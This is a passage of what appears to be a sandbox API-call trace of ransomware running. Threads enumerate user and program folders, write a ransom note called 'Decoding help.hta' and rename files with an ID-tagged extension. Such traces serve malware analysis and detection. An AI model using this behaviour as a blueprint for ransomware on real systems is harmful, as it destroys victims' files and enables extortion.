returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*" [0047.320] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*") returned 64 [0047.320] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\", lpString2="CryptnetUrlCache" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache" [0047.320] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*" [0047.320] GlobalMemoryStatus (in: lpBuffer=0x2290fd10 | out: lpBuffer=0x2290fd10) [0047.320] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10c9e868, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x360 [0047.330] CloseHandle (hObject=0x360) returned 1 [0047.330] FindNextFileW (in: hFindFile=0x5da278, lpFindFileData=0x2290fd30 | out: lpFindFileData=0x2290fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IME12", cAlternateFileName="")) returned 1 [0047.330] lstrcmpW (lpString1=".", lpString2="IME12") returned -1 [0047.330] lstrcmpW (lpString1="..", lpString2="IME12") returned -1 [0047.330] lstrcmpiW (lpString1="windows", lpString2="IME12") returned 1 [0047.330] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*" [0047.330] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*") returned 64 [0047.330] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\", lpString2="IME12" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12" [0047.330] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\*.*" [0047.330] GlobalMemoryStatus (in: lpBuffer=0x2290fd10 | out: lpBuffer=0x2290fd10) [0047.331] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x114d11f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x360 [0047.352] CloseHandle (hObject=0x360) returned 1 [0047.352] FindNextFileW (in: hFindFile=0x5da278, lpFindFileData=0x2290fd30 | out: lpFindFileData=0x2290fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP12", cAlternateFileName="")) returned 1 [0047.352] lstrcmpW (lpString1=".", lpString2="IMJP12") returned -1 [0047.352] lstrcmpW (lpString1="..", lpString2="IMJP12") returned -1 [0047.352] lstrcmpiW (lpString1="windows", lpString2="IMJP12") returned 1 [0047.352] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*" [0047.352] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*") returned 64 [0047.352] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\", lpString2="IMJP12" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12" [0047.352] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\*.*" [0047.353] GlobalMemoryStatus (in: lpBuffer=0x2290fd10 | out: lpBuffer=0x2290fd10) [0047.353] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x114850b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x524 [0047.402] CloseHandle (hObject=0x524) returned 1 [0047.402] FindNextFileW (in: hFindFile=0x5da278, lpFindFileData=0x2290fd30 | out: lpFindFileData=0x2290fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP8_1", cAlternateFileName="")) returned 1 [0047.402] lstrcmpW (lpString1=".", lpString2="IMJP8_1") returned -1 [0047.402] lstrcmpW (lpString1="..", lpString2="IMJP8_1") returned -1 [0047.402] lstrcmpiW (lpString1="windows", lpString2="IMJP8_1") returned 1 [0047.403] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*" [0047.403] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*") returned 64 [0047.403] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\", lpString2="IMJP8_1" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1" [0047.403] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\*.*" [0047.403] GlobalMemoryStatus (in: lpBuffer=0x2290fd10 | out: lpBuffer=0x2290fd10) [0047.403] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x115012c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x524 [0047.434] CloseHandle (hObject=0x524) returned 1 [0047.434] FindNextFileW (in: hFindFile=0x5da278, lpFindFileData=0x2290fd30 | out: lpFindFileData=0x2290fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP9_0", cAlternateFileName="")) returned 1 [0047.434] lstrcmpW (lpString1=".", lpString2="IMJP9_0") returned -1 [0047.434] lstrcmpW (lpString1="..", lpString2="IMJP9_0") returned -1 [0047.434] lstrcmpiW (lpString1="windows", lpString2="IMJP9_0") returned 1 [0047.435] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*" [0047.435] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*") returned 64 [0047.435] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\", lpString2="IMJP9_0" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0" [0047.435] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\*.*" [0047.435] GlobalMemoryStatus (in: lpBuffer=0x2290fd10 | out: lpBuffer=0x2290fd10) [0047.435] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c301e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x524 [0047.450] CloseHandle (hObject=0x524) returned 1 [0047.450] FindNextFileW (in: hFindFile=0x5da278, lpFindFileData=0x2290fd30 | out: lpFindFileData=0x2290fd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0047.450] lstrcmpW (lpString1=".", lpString2="Internet Explorer") returned -1 [0047.450] lstrcmpW (lpString1="..", lpString2="Internet Explorer") returned -1 [0047.450] lstrcmpiW (lpString1="windows", lpString2="Internet Explorer") returned 1 [0047.453] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*" [0047.453] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*") returned 64 [0047.453] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\", lpString2="Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer" [0047.453] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*.*" [0047.453] GlobalMemoryStatus (in: lpBuffer=0x2290fd10 | out: lpBuffer=0x2290fd10) [0047.453] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24590ff8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x524 [0047.466] CloseHandle (hObject=0x524) returned 1 [0047.466] FindNextFileW (in: hFindFile=0x5da278, lpFindFileData=0x2290fd30 | out: lpFindFileData=0x2290fd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 0 [0047.466] FindClose (in: hFindFile=0x5da278 | out: hFindFile=0x5da278) returned 1 Thread: id = 514 os_tid = 0xc4c [0047.330] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\*.*", lpFindFileData=0x22a4fd30 | out: lpFindFileData=0x22a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81305af3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81305af3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3170 [0049.447] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.447] FindNextFileW (in: hFindFile=0x5e3170, lpFindFileData=0x22a4fd30 | out: lpFindFileData=0x22a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81305af3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81305af3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.447] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.447] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.447] FindNextFileW (in: hFindFile=0x5e3170, lpFindFileData=0x22a4fd30 | out: lpFindFileData=0x22a4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7ecacfc, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0xc7ecacfc, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0xc7ef0e5c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x7e000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Ink.dll", cAlternateFileName="")) returned 1 [0049.668] lstrcpyW (in: lpString1=0x10d3ea98, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\*.*" [0049.668] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\*.*") returned 68 [0049.668] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Decoding help.hta" [0049.669] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.7\\decoding help.hta")) returned 0xffffffff [0049.669] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.7\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x518 [0051.180] WriteFile (in: hFile=0x518, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x22a4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x22a4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0054.011] CloseHandle (hObject=0x518) returned 1 [0055.313] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.144] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.Ink.dll") returned -1 [0058.144] lstrlenW (lpString="Microsoft.Ink.dll") returned 17 [0058.144] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\*.*" [0058.144] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\*.*") returned 68 [0058.144] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\", lpString2="Microsoft.Ink.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Microsoft.Ink.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Microsoft.Ink.dll" [0058.144] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Microsoft.Ink.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Microsoft.Ink.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Microsoft.Ink.dll" [0058.144] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Microsoft.Ink.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Microsoft.Ink.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Microsoft.Ink.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.144] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Microsoft.Ink.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.7\\microsoft.ink.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Microsoft.Ink.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.7\\microsoft.ink.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.067] FindNextFileW (in: hFindFile=0x5e3170, lpFindFileData=0x22a4fd30 | out: lpFindFileData=0x22a4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7ecacfc, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0xc7ecacfc, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0xc7ef0e5c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x7e000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Ink.dll", cAlternateFileName="")) returned 0 [0059.067] FindClose (in: hFindFile=0x5e3170 | out: hFindFile=0x5e3170) returned 1 Thread: id = 515 os_tid = 0xc50 [0047.352] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*.*", lpFindFileData=0x22b8fd30 | out: lpFindFileData=0x22b8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2bf0 [0050.050] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.050] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0x22b8fd30 | out: lpFindFileData=0x22b8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.050] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.050] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.050] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0x22b8fd30 | out: lpFindFileData=0x22b8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0050.050] lstrcmpW (lpString1=".", lpString2="Java") returned -1 [0050.050] lstrcmpW (lpString1="..", lpString2="Java") returned -1 [0050.050] lstrcmpiW (lpString1="windows", lpString2="Java") returned 1 [0050.262] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*.*" [0050.262] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*.*") returned 58 [0050.262] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\", lpString2="Java" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java" [0050.262] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*.*" [0050.262] GlobalMemoryStatus (in: lpBuffer=0x22b8fd10 | out: lpBuffer=0x22b8fd10) [0050.262] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10de6dc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x308 [0050.264] CloseHandle (hObject=0x308) returned 1 [0050.264] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0x22b8fd30 | out: lpFindFileData=0x22b8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 0 [0050.264] FindClose (in: hFindFile=0x5e2bf0 | out: hFindFile=0x5e2bf0) returned 1 Thread: id = 516 os_tid = 0xc54 [0047.363] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\*.*", lpFindFileData=0x22ccfd30 | out: lpFindFileData=0x22ccfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671270 [0047.363] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.363] FindNextFileW (in: hFindFile=0x671270, lpFindFileData=0x22ccfd30 | out: lpFindFileData=0x22ccfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, 